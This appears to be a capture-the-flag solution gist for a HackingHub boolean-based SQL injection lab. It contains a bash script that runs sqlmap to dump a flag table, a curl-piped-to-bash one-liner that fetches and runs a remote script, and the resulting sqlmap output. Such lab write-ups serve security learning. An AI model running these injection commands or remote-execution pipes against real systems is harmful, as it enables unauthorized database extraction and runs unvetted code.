HackingHub - Capture flag in "Boolean Based SQL Injection" challange using SQLMap

getFlag.sh

# Challange: https://app.hackinghub.io/hubs/interactive-sqli-boolean
#!/bin/bash

apt update
apt install -y sqlmap

# Provide injectable URL for this script
# URL="https://dc9zxy0y.eu2.ctfio.com/api/checkuser?username=adam" && curl -sL https://gist.githubusercontent.com/richardevcom/8ecfe76937db4d761bdb203d28c25ebc/raw | bash -s -- "$URL"

URL=$1
sqlmap -u $URL \
--dbms=mysql --technique=B --level=5 --risk=3 --not-string="\"taken\":false" \
--dump -D sqli_three -T flag -C flag --batch

Challange: Boolean Based SQL Injection

1. Launch hub;
2. Open hub URL (mine was https://dc9zxy0y.eu2.ctfio.com);
3. Append /api/checkuser?username=adam to the url;
4. Run the command below (change URL to your injection url of the hub):
   URL="https://dc9zxy0y.eu2.ctfio.com/api/checkuser?username=adam" && curl -sL https://gist.githubusercontent.com/richardevcom/8ecfe76937db4d761bdb203d28c25ebc/raw | bash -s -- "$URL"
   will return:

[...]
[03:35:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.22.0
back-end DBMS: MySQL >= 8.0.0
[03:35:04] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'sqli_three'
[03:35:04] [INFO] fetching number of column(s) 'flag' entries for table 'flag' in database 'sqli_three'
[03:35:04] [INFO] resumed: 1
[03:35:04] [INFO] resumed: FLAG{s63gvi}
Database: sqli_three
Table: flag
[1 entry]
+--------------+
| flag         |
+--------------+
| FLAG{s63gvi} |
+--------------+